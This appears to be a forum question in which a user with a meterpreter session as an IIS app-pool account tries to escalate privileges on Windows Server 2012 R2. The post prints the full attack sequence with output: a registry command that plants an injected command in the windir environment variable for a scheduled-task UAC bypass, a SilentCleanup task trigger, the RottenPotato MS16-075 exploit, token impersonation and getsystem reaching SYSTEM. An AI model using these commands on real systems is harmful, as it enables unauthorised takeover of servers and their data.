I am trying to escalate privileges from an ISS user on Windows Server 2012 R2 by exploiting Environment Variables in Scheduled Tasks for UAC Bypass as the following link explains the exploit:
https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html
Short Story: The article explains that as CU, an attacker can override the path of an already scheduled task with "RunLevel: Highest" (Highest Privileges) with another path.
Unfortunately for me:
meterpreter > shell
Process 11056 created.
Channel 26 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
d:\UploadFolder>reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
ERROR: Access is denied.
d:\UploadFolder>
But:
d:\UploadFolder>schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
SUCCESS: Attempted to run the scheduled task "\Microsoft\Windows\DiskCleanup\SilentCleanup".
Is there a way to bypass the error "ERROR: Access is denied." for the HKCU?
Later Edit:
I was able to use the rottenpotato.exe (exploit payload for MS16-075) in order to get NT AUTHORITY\SYSTEM on the system. So I can use a vulnerability from 2016 but I can not use a vulnerability from 2017 because of that "ERROR: Access is denied.".
meterpreter > execute -f rottenpotato.exe -Hc
Process 6960 created.
Channel 1 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
IIS APPPOOL\BOX
Impersonation Tokens Available
========================================
NT AUTHORITY\IUSR
NT AUTHORITY\SYSTEM
meterpreter > impersonate_token "NT AUTHORITY\\System"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Later Edit 2:
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeIncreaseQuotaPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeCreateGlobalPrivilege
SeIncreaseWorkingSetPrivilege
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeIncreaseQuotaPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeCreateGlobalPrivilege
SeIncreaseWorkingSetPrivilege
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
I tried then to exploiting environment Variables in Scheduled Tasks for UAC Bypass while NT AUTHORITY\SYSTEM, after a while (5 minutes) a new meterpreter shell popped out and:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getpr
getprivs getproxy
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeRelabelPrivilege
SeChangeNotifyPrivilege
SeTcbPrivilege
SeCreateGlobalPrivilege
SeSystemEnvironmentPrivilege
SeCreatePagefilePrivilege
SeManageVolumePrivilege
SeCreatePermanentPrivilege
SeSecurityPrivilege
SeCreateSymbolicLinkPrivilege
SeSystemtimePrivilege
SeCreateTokenPrivilege
SeTrustedCredManAccessPrivilege
SeDebugPrivilege
SeProfileSingleProcessPrivilege
SeImpersonatePrivilege
SeRestorePrivilege
SeIncreaseBasePriorityPrivilege
SeShutdownPrivilege
SeIncreaseQuotaPrivilege
SeSystemProfilePrivilege
SeIncreaseWorkingSetPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeTimeZonePrivilege
SeLockMemoryPrivilege
SeUndockPrivilege
meterpreter >
